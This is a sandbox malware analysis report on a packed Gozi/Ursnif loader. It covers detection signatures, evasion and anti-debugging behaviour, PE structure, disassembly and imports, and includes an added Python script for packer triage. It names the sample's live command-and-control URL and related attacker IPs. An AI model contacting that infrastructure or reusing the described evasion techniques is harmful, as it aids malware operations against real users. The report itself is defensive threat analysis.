      Source: 00000000.00000002.580571515.00000000004D6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: Process Memory Space: server_(3).exe PID: 1236, type: MEMORYSTR | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: Process Memory Space: server_(3).exe PID: 1236, type: MEMORYSTR | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: C:\Users\user\Desktop\server_(3).exe | Code function: 0_2_005E16DF 0_2_005E16DF
      Source: C:\Users\user\Desktop\server_(3).exe | Code function: 0_2_005E832C 0_2_005E832C
      Source: C:\Users\user\Desktop\server_(3).exe | Code function: 0_2_005E1D8A 0_2_005E1D8A
      Source: C:\Users\user\Desktop\server_(3).exe | Code function: 0_2_0040110B GetProcAddress,NtCreateSection,memset, 0_2_0040110B
      Source: C:\Users\user\Desktop\server_(3).exe | Code function: 0_2_00401459 NtMapViewOfSection, 0_2_00401459
      Source: C:\Users\user\Desktop\server_(3).exe | Code function: 0_2_004019F1 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, 0_2_004019F1
      Source: C:\Users\user\Desktop\server_(3).exe | Code function: 0_2_005E421F NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 0_2_005E421F
      Source: C:\Users\user\Desktop\server_(3).exe | Code function: 0_2_005E8551 NtQueryVirtualMemory, 0_2_005E8551
      Source: C:\Users\user\Desktop\server_(3).exe | Code function: 0_2_005C1C58 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,CreateThread,QueueUserAPC,GetLastError,TerminateThread,SetLastError,WaitForSingleObject,GetExitCodeThread,GetLastError,GetLastError, 0_2_005C1C58
      Source: server_(3).exe | ReversingLabs: Detection: 38%
      Source: server_(3).exe | Virustotal: Detection: 37%
      Source: server_(3).exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\server_(3).exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Users\user\Desktop\server_(3).exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
      Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@1/1
      Source: C:\Users\user\Desktop\server_(3).exe | Code function: 0_2_005E30D5 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 0_2_005E30D5
      Source: C:\Users\user\Desktop\server_(3).exe | File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Users\user\Desktop\server_(3).exe | File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Users\user\Desktop\server_(3).exe | File opened: C:\Windows\SysWOW64\msvcr100.dll

      Data Obfuscation

Source: C:\Users\user\Desktop\server_(3).exe | Unpacked PE file: 0.2.server_(3).exe.400000.0.unpack
Source: C:\Users\user\Desktop\server_(3).exe | Unpacked PE file: 0.2.server_(3).exe.400000.0.unpack; sections of the file on disk: .text:ER;.data:W;.wuke:W;.rsrc:R; vs sections of the unpacked image: .text:ER;.rdata:R;.data:W;.bss:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\Desktop\server_(3).exe | Code function: 0_2_005E831B push ecx; ret 0_2_005E832B
Source: C:\Users\user\Desktop\server_(3).exe | Code function: 0_2_005E7F30 push ecx; ret 0_2_005E7F39
Source: server_(3).exe | Static PE information: section name: .wuke
Source: C:\Users\user\Desktop\server_(3).exe | Code function: 0_2_00401000 LoadLibraryA,GetProcAddress
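The two "Unpacked PE file" lines above and the section table further down (entropy 7.85 and ZLIB complexity 0.95 for .data, a non-standard .wuke section, and a .data virtual size roughly 7.5 times its raw size) are the static side of the packer verdict. The Python below is an added example, not Joe Sandbox code: it parses the report's compact rights strings to show what the "changes PE section rights" comparison actually reports, and applies the usual entropy, section-name and size-ratio heuristics to the section table transcribed from this report. The thresholds and the list of standard section names are assumptions of the example, not values the report states.

```python
"""Static triage of the packed-loader indicators in this report.

Added example, not Joe Sandbox code. The section table and the two
section-rights strings are transcribed from the report; the entropy
threshold, the standard-section-name list and the size-ratio threshold
are analyst assumptions.
"""
import math
from collections import Counter

# Section table transcribed from the report:
# (name, virtual size, raw size, entropy, characteristics)
SECTIONS_ON_DISK = [
    (".text", 0xb144, 0xb200, 6.0109927875042635, {"CODE", "EXECUTE", "READ"}),
    (".data", 0x9072c, 0x13200, 7.852935841663951, {"INITIALIZED_DATA", "READ", "WRITE"}),
    (".wuke", 0x96, 0x200, 0.0, {"INITIALIZED_DATA", "READ", "WRITE"}),
    (".rsrc", 0xdaf0, 0xdc00, 4.473611819780319, {"INITIALIZED_DATA", "READ"}),
]

# Rights strings exactly as the "Unpacked PE file" signature prints them:
# the file on disk first, the unpacked in-memory image second.
RIGHTS_ON_DISK = ".text:ER;.data:W;.wuke:W;.rsrc:R;"
RIGHTS_UNPACKED = ".text:ER;.rdata:R;.data:W;.bss:W;.rsrc:R;.reloc:R;"

# Assumptions: section names the MSVC linker emits, and "looks packed" thresholds.
STANDARD_SECTIONS = {".text", ".rdata", ".data", ".bss", ".rsrc", ".reloc",
                     ".idata", ".edata", ".pdata", ".tls", ".CRT"}
ENTROPY_PACKED = 7.0      # bits per byte; compressed or encrypted data sits near 8
VSIZE_RAW_RATIO = 4       # virtual size this many times raw size = large zero-filled area


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte, the measure behind the report's Entropy column."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_rights(spec: str) -> dict:
    """'.text:ER;.data:W;' -> {'.text': 'ER', '.data': 'W'}"""
    rights = {}
    for item in spec.split(";"):
        if item.strip():
            name, _, flags = item.partition(":")
            rights[name.strip()] = flags.strip()
    return rights


def diff_section_rights(disk_spec: str, memory_spec: str) -> dict:
    """What the 'changes PE section rights' signature compares: sections present
    in only one image, and sections whose rights differ between the two."""
    disk, mem = parse_rights(disk_spec), parse_rights(memory_spec)
    return {
        "only_on_disk": sorted(set(disk) - set(mem)),
        "only_in_memory": sorted(set(mem) - set(disk)),
        "rights_changed": sorted(n for n in disk.keys() & mem.keys() if disk[n] != mem[n]),
    }


def triage_sections(sections) -> list:
    """Return (section, finding) pairs from the cheap static packer heuristics."""
    findings = []
    for name, vsize, rawsize, entropy, chars in sections:
        if name not in STANDARD_SECTIONS:
            findings.append((name, "non-standard section name"))
        if entropy > ENTROPY_PACKED:
            findings.append((name, "high entropy, likely compressed or encrypted payload"))
        if {"EXECUTE", "WRITE"} <= chars:
            findings.append((name, "writable and executable"))
        if rawsize and vsize >= VSIZE_RAW_RATIO * rawsize:
            findings.append((name, "virtual size far exceeds raw size, room for an unpacked image"))
    return findings


if __name__ == "__main__":
    for sec, why in triage_sections(SECTIONS_ON_DISK):
        print(f"{sec:6} {why}")
    print(diff_section_rights(RIGHTS_ON_DISK, RIGHTS_UNPACKED))
    # The entropy measure on two constructed buffers: uniform bytes and all zeros.
    print(shannon_entropy(bytes(range(256)) * 4), shannon_entropy(b"\x00" * 512))
```

The rights diff is the interesting part: the unpacked image gains .rdata, .bss and .reloc and loses .wuke, which is the layout of a different, properly linked PE written over the loader's own image at 0x400000, not the loader's sections with permissions toggled. On the section table the heuristics fire only on .data (entropy, size ratio) and .wuke (name); .text stays clean, which is consistent with a small unpacking stub in .text and the payload carried in .data.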

      Hooking and other Techniques for Hiding and Protection

      Source: Yara matchFile source: 00000000.00000003.514574237.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.514378176.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.514450320.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.514589845.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.514416763.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.514479802.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.514505620.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.580765376.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.514528355.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: server_(3).exe PID: 1236, type: MEMORYSTR
Source: C:\Users\user\Desktop\server_(3).exe | Process information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

Source: C:\Users\user\Desktop\server_(3).exe | Evasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleep
Source: C:\Users\user\Desktop\server_(3).exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\Desktop\server_(3).exe | API call chain: ExitProcess graph end node

      Anti Debugging

Source: C:\Users\user\Desktop\server_(3).exe | Debugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep
Source: C:\Users\user\Desktop\server_(3).exe | Code function: 0_2_00401000 LoadLibraryA,GetProcAddress
Source: C:\Users\user\Desktop\server_(3).exe | Code function: 0_2_005C092B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\server_(3).exe | Code function: 0_2_005C0D90 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\server_(3).exe | Code function: 0_2_004019F1 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError
Source: C:\Users\user\Desktop\server_(3).exe | Code function: 0_2_005C1C58 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,CreateThread,QueueUserAPC,GetLastError,TerminateThread,SetLastError,WaitForSingleObject,GetExitCodeThread,GetLastError,GetLastError
Source: C:\Users\user\Desktop\server_(3).exe | Code function: 0_2_005E3BD3 cpuid
Source: C:\Users\user\Desktop\server_(3).exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\server_(3).exe | Code function: 0_2_004015B0 GetSystemTimeAsFileTime,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError
Source: C:\Users\user\Desktop\server_(3).exe | Code function: 0_2_00401D68 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError
Source: C:\Users\user\Desktop\server_(3).exe | Code function: 0_2_005E3BD3 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree

      Stealing of Sensitive Information

Source: Yara match | File sources: the same nine memory dumps of region 0x2BC8000 (00000000.00000003.514378176 through 00000000.00000002.580765376, type: MEMORY) and the process memory space of server_(3).exe PID: 1236 (type: MEMORYSTR) listed under Hooking and other Techniques for Hiding and Protection above

      Remote Access Functionality

Source: Yara match | File sources: the same nine memory dumps of region 0x2BC8000 (00000000.00000003.514378176 through 00000000.00000002.580765376, type: MEMORY) and the process memory space of server_(3).exe PID: 1236 (type: MEMORYSTR) listed under Hooking and other Techniques for Hiding and Protection above
MITRE ATT&CK Matrix (rendered as a 14-column table on the original page; the cell layout did not survive extraction and is not reproduced here). Columns: Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Exfiltration, Command and Control, Network Effects, Remote Service Effects, Impact. Techniques that carry a signature-count badge in the flattened matrix text (the counts themselves are not recoverable): Windows Management Instrumentation, Native API, Virtualization/Sandbox Evasion, Obfuscated Files or Information, Software Packing, System Time Discovery, Security Software Discovery, Process Discovery, Account Discovery, System Owner/User Discovery, Remote System Discovery, System Information Discovery, Archive Collected Data, Ingress Tool Transfer, Encrypted Channel, Non-Application Layer Protocol, Application Layer Protocol, Data Encrypted for Impact.
Source          Detection  Scanner         Label
server_(3).exe  38%        ReversingLabs   Win32.Ransomware.LockbitCrypt
server_(3).exe  38%        Virustotal
server_(3).exe  100%       Joe Sandbox ML

No Antivirus matches (dropped files)

Source                              Detection  Scanner  Label
0.2.server_(3).exe.5e0000.2.unpack  100%       Avira    HEUR/AGEN.1245293
0.2.server_(3).exe.400000.0.unpack  100%       Avira    TR/Crypt.XPACK.Gen7

No Antivirus matches (domains)

Source          Detection  Scanner          Label
http://62.173.142.81/drew/l9wdesHCBL/WcUH_2Fe6cEC19JMx/ojSec9BNMFM6/V8tDDFde77O/U9i1cqxDkO368R/9gNBIEzgy6mBOfdpOkxLi/yTSQzU5LkHeJ3ST8/wg2AtPFgVdoBaEt/6J4T7kNNoupXFHQTJc/6wx_2FfTi/ip9uaIqtLaRaENmKe5lk/gWcrKu3HuxIt5fBBNoX/csBNoK1ie3PBW5Bt5sLiYK/wkK58GrNqzGj0/jf15aQpx/17gepP_2BoXbW_2FEP_2BQC/qQ5KGV_2Fv/ErJyFWv8XjZRosjau/Q6z6usxdqA4/_2FeDY.jlk  0%  Avira URL Cloud  safe
http://62.173   0%         Avira URL Cloud  safe
http://62.173   0%         Virustotal
Domains
Name                 IP       Active   Malicious  Antivirus Detection  Reputation
checklist.skype.com  unknown  unknown  false                           high

Contacted URLs
Name                                    Malicious  Antivirus Detection    Reputation
http://62.173.142.81/drew/l9wdesHCBL/WcUH_2Fe6cEC19JMx/ojSec9BNMFM6/V8tDDFde77O/U9i1cqxDkO368R/9gNBIEzgy6mBOfdpOkxLi/yTSQzU5LkHeJ3ST8/wg2AtPFgVdoBaEt/6J4T7kNNoupXFHQTJc/6wx_2FfTi/ip9uaIqtLaRaENmKe5lk/gWcrKu3HuxIt5fBBNoX/csBNoK1ie3PBW5Bt5sLiYK/wkK58GrNqzGj0/jf15aQpx/17gepP_2BoXbW_2FEP_2BQC/qQ5KGV_2Fv/ErJyFWv8XjZRosjau/Q6z6usxdqA4/_2FeDY.jlk  true  Avira URL Cloud: safe  unknown

URLs found in memory or binary data
Name           Source                                                                                        Malicious  Antivirus Detection                        Reputation
http://62.173  server_(3).exe, 00000000.00000002.580737497.000000000238C000.00000004.00000010.00020000.00000000.sdmp  false  0% Virustotal; Avira URL Cloud: safe  low

Reputation legend (share of IPs seen): less than 25%; 25% to 50%; 50% to 75%; more than 75%

Contacted IPs
IP             Domain   Country             ASN    ASN Name                              Malicious
62.173.142.81  unknown  Russian Federation  34300  SPACENET-ASInternetServiceProviderRU  true
        Joe Sandbox Version:37.0.0 Beryl
        Analysis ID:830450
        Start date and time:2023-03-20 11:45:24 +01:00
        Joe Sandbox Product:CloudBasic
        Overall analysis duration:0h 5m 33s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:7
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • HDC enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample file name:server_(3).exe
        Detection:MAL
        Classification:mal100.troj.evad.winEXE@1/0@1/1
        EGA Information:
        • Successful, ratio: 100%
        HDC Information:
        • Successful, ratio: 71.9% (good quality ratio 69.9%)
        • Quality average: 82%
        • Quality standard deviation: 26.5%
        HCA Information:
        • Successful, ratio: 98%
        • Number of executed functions: 42
        • Number of non-executed functions: 40
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, WmiPrvSE.exe
• Not all processes were analyzed, report is missing behavior information
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
Match: SPACENET-ASInternetServiceProviderRU (AS34300). Other samples seen contacting this ASN, with the IP each used and its detected threat name:
gozi_loader.bin.exe  62.173.141.252  Ursnif
server.exe           62.173.142.51   Ursnif
server.exe           62.173.142.51   Ursnif
KOYCdGz80D.exe       62.173.142.51   Ursnif
server.exe           62.173.142.51   Ursnif, CryptOne
server.exe           62.173.142.51   Ursnif
server.exe           62.173.142.51   Ursnif
server.exe           62.173.142.51   Ursnif
server.exe           62.173.140.236  Ursnif
server.exe           62.173.140.236  Ursnif
server.exe           62.173.140.236  Ursnif
server.exe           62.173.141.36   Ursnif
server.exe           62.173.141.36   Ursnif
lQj2udnlAj.exe       62.173.141.36   Ursnif
server.exe           62.173.141.36   Ursnif
server.exe           62.173.138.6    Ursnif
server.exe           62.173.138.6    Ursnif
server.exe           62.173.138.6    Ursnif
server.exe           62.173.140.103  Ursnif
server.exe           62.173.140.103  Ursnif
        No created / dropped files found
        File type:PE32 executable (GUI) Intel 80386, for MS Windows
        Entropy (8bit):6.797824417239488
        TrID:
        • Win32 Executable (generic) a (10002005/4) 99.96%
        • Generic Win/DOS Executable (2004/3) 0.02%
        • DOS Executable Generic (2002/1) 0.02%
        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
        File name:server_(3).exe
        File size:181760
        MD5:aa37b36ea7ba39b6c00ae1b01bada3f7
        SHA1:90545746e5b23fcdf7db1fa5c30588df2f4c31bf
        SHA256:a6886a3566a1a98072d67f1aca4a04b5667f97f4df21b2f54d6108293d7c02b7
        SHA512:1a3d446ab096e25b840c442356169333e10db16baa24d9f5842eddad4b8303dba3957310e1ba8545ebbb5379b7b1f84c3ca2957d3d29cd8ea85f014a9abe0772
        SSDEEP:3072:sKUXgTGIAmez+JQAxHun7YB5ahAWlS5UQjV:0gTfBfxAkBSAP5
        TLSH:C7049EC35390BC51E4158A3A8E2FC2F4AB4DFC51CE58AB66F3086E2F4CBC162D5A6751
        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............f.Q.f.Q.f.Q...Q.f.Q..4Q.f.Q...Q.f.Q..9Q.f.Q.f.Q.f.Q...Q.f.Q..0Q.f.Q..7Q.f.QRich.f.Q........PE..L.....eb...................
        Icon Hash:ba824246a5a2a29a
        Entrypoint:0x402f11
        Entrypoint Section:.text
        Digitally signed:false
        Imagebase:0x400000
        Subsystem:windows gui
        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
        DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
        Time Stamp:0x626505B2 [Sun Apr 24 08:09:22 2022 UTC]
        TLS Callbacks:
        CLR (.Net) Version:
        OS Version Major:5
        OS Version Minor:1
        File Version Major:5
        File Version Minor:1
        Subsystem Version Major:5
        Subsystem Version Minor:1
        Import Hash:0c16d61a145a6038e0c4acd3e1db8764
        Instruction
        call 00007F62A4AE81C0h
        jmp 00007F62A4AE57EEh
        mov eax, 0040D008h
        ret
        mov eax, dword ptr [0049D720h]
        push esi
        push 00000014h
        pop esi
        test eax, eax
        jne 00007F62A4AE5969h
        mov eax, 00000200h
        jmp 00007F62A4AE5968h
        cmp eax, esi
        jnl 00007F62A4AE5969h
        mov eax, esi
        mov dword ptr [0049D720h], eax
        push 00000004h
        push eax
        call 00007F62A4AE826Eh
        pop ecx
        pop ecx
        mov dword ptr [0049C700h], eax
        test eax, eax
        jne 00007F62A4AE5980h
        push 00000004h
        push esi
        mov dword ptr [0049D720h], esi
        call 00007F62A4AE8255h
        pop ecx
        pop ecx
        mov dword ptr [0049C700h], eax
        test eax, eax
        jne 00007F62A4AE5967h
        push 0000001Ah
        pop eax
        pop esi
        ret
        xor edx, edx
        mov ecx, 0040D008h
        jmp 00007F62A4AE5967h
        mov eax, dword ptr [0049C700h]
        mov dword ptr [edx+eax], ecx
        add ecx, 20h
        add edx, 04h
        cmp ecx, 0040D288h
        jl 00007F62A4AE594Ch
        push FFFFFFFEh
        pop esi
        xor edx, edx
        mov ecx, 0040D018h
        push edi
        mov eax, edx
        sar eax, 05h
        mov eax, dword ptr [0049C600h+eax*4]
        mov edi, edx
        and edi, 1Fh
        shl edi, 06h
        mov eax, dword ptr [edi+eax]
        cmp eax, FFFFFFFFh
        je 00007F62A4AE596Ah
        cmp eax, esi
        je 00007F62A4AE5966h
        test eax, eax
        jne 00007F62A4AE5964h
        mov dword ptr [ecx], esi
        add ecx, 20h
        inc edx
        cmp ecx, 0040D078h
        jl 00007F62A4AE5930h
        pop edi
        xor eax, eax
        pop esi
        ret
        call 00007F62A4AE5F76h
        cmp byte ptr [00000000h], 00000000h
        Programming Language:
        • [C++] VS2010 build 30319
        • [ASM] VS2010 build 30319
        • [ C ] VS2010 build 30319
        • [IMP] VS2008 SP1 build 30729
        • [RES] VS2010 build 30319
        • [LNK] VS2010 build 30319
Data directories
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xb7fc           0x3c          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x9f000          0xdaf0        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x2ae8           0x40          .text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x1000           0x19c         .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Sections
Name   Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity     File Type  Entropy             Characteristics
.text  0x1000           0xb144        0xb200    False     0.513232970505618   data       6.0109927875042635  IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data  0xd000           0x9072c       0x13200   False     0.946142258986928   data       7.852935841663951   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.wuke  0x9e000          0x96          0x200     False     0.02734375          data       0.0                 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc  0x9f000          0xdaf0        0xdc00    False     0.4132634943181818  data       4.473611819780319   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Resources
Name                   RVA      Size    Type                                                               Language (Country)
AFX_DIALOG_LAYOUT      0xab598  0x2     data
TONIZITOHOWAPEVUMOBEM  0xaaea0  0x598   ASCII text, with very long lines (1432), with no line terminators  Sami Lappish (Finland, Norway, Sweden)
RT_CURSOR              0xab5a0  0x130   Device independent bitmap graphic, 32 x 64 x 1, image size 0
RT_CURSOR              0xab6d0  0xf0    Device independent bitmap graphic, 24 x 48 x 1, image size 0
RT_CURSOR              0xab7c0  0x10a8  Device independent bitmap graphic, 32 x 64 x 32, image size 0
RT_ICON                0x9f680  0x8a8   Device independent bitmap graphic, 32 x 64 x 8, image size 0       Sami Lappish (Finland, Norway, Sweden)
RT_ICON                0x9ff28  0x10a8  Device independent bitmap graphic, 32 x 64 x 32, image size 0      Sami Lappish (Finland, Norway, Sweden)
RT_ICON                0xa0ff8  0x8a8   Device independent bitmap graphic, 32 x 64 x 8, image size 0       Sami Lappish (Finland, Norway, Sweden)
RT_ICON                0xa18a0  0x25a8  Device independent bitmap graphic, 48 x 96 x 32, image size 0      Sami Lappish (Finland, Norway, Sweden)
RT_ICON                0xa3e48  0x10a8  Device independent bitmap graphic, 32 x 64 x 32, image size 0      Sami Lappish (Finland, Norway, Sweden)
RT_ICON                0xa4f20  0xea8   Device independent bitmap graphic, 48 x 96 x 8, image size 0       Sami Lappish (Finland, Norway, Sweden)
RT_ICON                0xa5dc8  0x6c8   Device independent bitmap graphic, 24 x 48 x 8, image size 0       Sami Lappish (Finland, Norway, Sweden)
RT_ICON                0xa6490  0x568   Device independent bitmap graphic, 16 x 32 x 8, image size 0       Sami Lappish (Finland, Norway, Sweden)
RT_ICON                0xa69f8  0x25a8  Device independent bitmap graphic, 48 x 96 x 32, image size 0      Sami Lappish (Finland, Norway, Sweden)
RT_ICON                0xa8fa0  0x10a8  Device independent bitmap graphic, 32 x 64 x 32, image size 0      Sami Lappish (Finland, Norway, Sweden)
RT_ICON                0xaa048  0x988   Device independent bitmap graphic, 24 x 48 x 32, image size 0      Sami Lappish (Finland, Norway, Sweden)
RT_ICON                0xaa9d0  0x468   Device independent bitmap graphic, 16 x 32 x 32, image size 0      Sami Lappish (Finland, Norway, Sweden)
RT_ACCELERATOR         0xab4e0  0x78    data                                                               Sami Lappish (Finland, Norway, Sweden)
RT_ACCELERATOR         0xab438  0xa8    data                                                               Sami Lappish (Finland, Norway, Sweden)
RT_GROUP_CURSOR        0xac868  0x30    data
RT_GROUP_ICON          0xa4ef0  0x30    data                                                               Sami Lappish (Finland, Norway, Sweden)
RT_GROUP_ICON          0xa0fd0  0x22    data                                                               Sami Lappish (Finland, Norway, Sweden)
RT_GROUP_ICON          0xaae38  0x68    data                                                               Sami Lappish (Finland, Norway, Sweden)
RT_VERSION             0xac898  0x258   data
None                   0xab558  0xa     data                                                               Sami Lappish (Finland, Norway, Sweden)
None                   0xab568  0xa     data                                                               Sami Lappish (Finland, Norway, Sweden)
None                   0xab578  0xa     data                                                               Sami Lappish (Finland, Norway, Sweden)
None                   0xab588  0xa     data                                                               Sami Lappish (Finland, Norway, Sweden)
Imports
DLL           Import
KERNEL32.dll  PulseEvent, SetDefaultCommConfigA, FindFirstFileW, EnumCalendarInfoA, _llseek, GetConsoleAliasA, GetCurrentProcess, InterlockedCompareExchange, SleepEx, GetWindowsDirectoryA, EnumTimeFormatsW, WriteFileGather, EnumResourceTypesA, ActivateActCtx, GlobalAlloc, GetFirmwareEnvironmentVariableA, LoadLibraryW, Sleep, ReadConsoleInputA, LeaveCriticalSection, GetFileAttributesW, WritePrivateProfileSectionW, TerminateProcess, IsDBCSLeadByte, lstrcmpW, GlobalUnlock, RaiseException, SetLastError, GetProcAddress, GlobalGetAtomNameA, OpenWaitableTimerA, AddAtomA, FindFirstVolumeMountPointA, GetModuleHandleA, FindNextFileW, GetShortPathNameW, GetCPInfoExA, SetCalendarInfoA, ReadConsoleInputW, DeleteFileW, EnumCalendarInfoExA, LocalFree, CopyFileExA, GetLastError, DeleteFileA, GetCommandLineA, HeapSetInformation, GetStartupInfoW, EnterCriticalSection, SetFilePointer, SetHandleCount, GetStdHandle, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, EncodePointer, DecodePointer, GetModuleHandleW, ExitProcess, WriteFile, GetModuleFileNameW, GetModuleFileNameA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, InterlockedIncrement, GetCurrentThreadId, InterlockedDecrement, HeapCreate, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, 